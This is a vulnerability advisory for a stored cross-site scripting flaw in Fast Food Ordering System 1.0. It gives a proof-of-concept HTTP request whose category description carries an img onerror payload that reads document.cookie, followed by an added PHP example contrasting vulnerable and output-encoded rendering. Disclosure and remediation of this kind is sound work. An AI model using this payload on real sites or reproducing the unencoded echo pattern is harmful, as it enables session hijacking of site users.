Fast Food Ordering System 1.0 Cross Site Scripting

2022.05.31
Credit: Ashish Kumar
Risk: Low
Local: No
Remote: Yes
CVE: N/A
CWE: CWE-79

## Title: Fast Food Ordering System 1.0 Stored Cross-Site Scripting
## Author: Ashish Kumar
## Date: 05.31.2022
## Vendor: https://www.sourcecodester.com/users/tips23
## Software: https://www.sourcecodester.com/php/15366/fast-food-ordering-system-phpoop-free-source-code.html
## Reference: https://medium.com/@cyberthoth/fast-food-ordering-system-1-0-cross-site-scripting-7927f4b1edd6

#Description:
#Line 255 of Master.php sends unvalidated data to a web browser, which can result in the browser executing malicious code.
#echo $Master->save_category();

#PoC:
POST /ffos/classes/Master.php?f=save_category HTTP/1.1
Host: localhost
Content-Length: 480
sec-ch-ua: "Chromium";v="97", " Not;A Brand";v="99"
Accept: application/json, text/javascript, */*; q=0.01
Content-Type: multipart/form-data; boundary=----WebKitFormBoundarySmYVeqOBMhcSziZM
X-Requested-With: XMLHttpRequest
sec-ch-ua-mobile: ?0
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/97.0.4692.71 Safari/537.36
sec-ch-ua-platform: "Windows"
Origin: http://localhost
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: cors
Sec-Fetch-Dest: empty
Referer: http://localhost/ffos/admin/?page=categories
Accept-Encoding: gzip, deflate
Accept-Language: en-GB,en-US;q=0.9,en;q=0.8
Cookie: PHPSESSID=junl7tbvb7hvrdeq776aislbcj
Connection: close

------WebKitFormBoundarySmYVeqOBMhcSziZM
Content-Disposition: form-data; name="id"

10
------WebKitFormBoundarySmYVeqOBMhcSziZM
Content-Disposition: form-data; name="name"

XSS
------WebKitFormBoundarySmYVeqOBMhcSziZM
Content-Disposition: form-data; name="description"

Testing XSS "><img src="" onerror="alert(document.cookie)">
------WebKitFormBoundarySmYVeqOBMhcSziZM
Content-Disposition: form-data; name="status"

1
------WebKitFormBoundarySmYVeqOBMhcSziZM--
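As an added example (not code from the Fast Food Ordering System project or from the advisory author), the PHP below contrasts the pattern the advisory describes, untrusted category fields echoed straight back to the browser, with a version that HTML-encodes on output and answers the save request as JSON, which is what the client's Accept header asks for. The function names, the row array and the shape of the handler are assumptions; the constructed sample row reuses the description payload from the PoC above so the difference between the two renderings is visible.

```php
<?php
// Added example, not the project's own code. Reconstructs the defect class from
// the advisory (raw request fields echoed into HTML) next to a hardened form.
// Function names and the $row / $post layouts are assumptions for illustration.

declare(strict_types=1);

/** Encode a string for safe insertion into HTML text or a quoted attribute. */
function h(string $s): string
{
    return htmlspecialchars($s, ENT_QUOTES | ENT_SUBSTITUTE | ENT_HTML5, 'UTF-8');
}

/** Vulnerable pattern (hypothetical): stored fields concatenated into markup unencoded. */
function render_category_unsafe(array $row): string
{
    return '<tr><td>' . $row['name'] . '</td><td>' . $row['description'] . '</td></tr>';
}

/** Hardened pattern: every untrusted value is encoded for the HTML context it lands in. */
function render_category_safe(array $row): string
{
    return '<tr><td>' . h($row['name']) . '</td><td>' . h($row['description']) . '</td></tr>';
}

/**
 * Hardened save handler (hypothetical): validate, then reply with JSON rather than
 * an HTML fragment. The caller is expected to send Content-Type: application/json.
 * The JSON_HEX_* flags make the body safe even if someone later inlines it in a page.
 */
function save_category_response(array $post): string
{
    $name        = trim((string)($post['name'] ?? ''));
    $description = trim((string)($post['description'] ?? ''));

    if ($name === '' || mb_strlen($name) > 100) {
        return json_encode(['status' => 'failed', 'msg' => 'Invalid category name'], JSON_THROW_ON_ERROR);
    }
    // Persisting with a prepared statement would happen here; the database layer is omitted.

    return json_encode(
        ['status' => 'success', 'name' => $name, 'description' => $description],
        JSON_THROW_ON_ERROR | JSON_HEX_TAG | JSON_HEX_AMP | JSON_HEX_APOS | JSON_HEX_QUOT
    );
}

// Constructed sample row; the description is the payload from the advisory's PoC.
$row = [
    'name'        => 'XSS',
    'description' => 'Testing XSS "><img src="" onerror="alert(document.cookie)">',
];

echo render_category_unsafe($row), PHP_EOL;   // tag and handler reach the browser as markup
echo render_category_safe($row), PHP_EOL;     // rendered as visible text: &lt;img ... &gt;
echo save_category_response($row), PHP_EOL;   // JSON with < > " ' escaped as \u003C etc.
```

Run it with `php example.php`: the first line still contains the `<img ... onerror=...>` element, the second shows the same input with `<`, `>` and `"` turned into entities, and the third shows the JSON form a consumer can safely insert into the DOM with `textContent` rather than `innerHTML`. Encoding at the output boundary, not at save time, is the fix that survives the data being reused in other views.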


Copyright 2022, cxsecurity.com
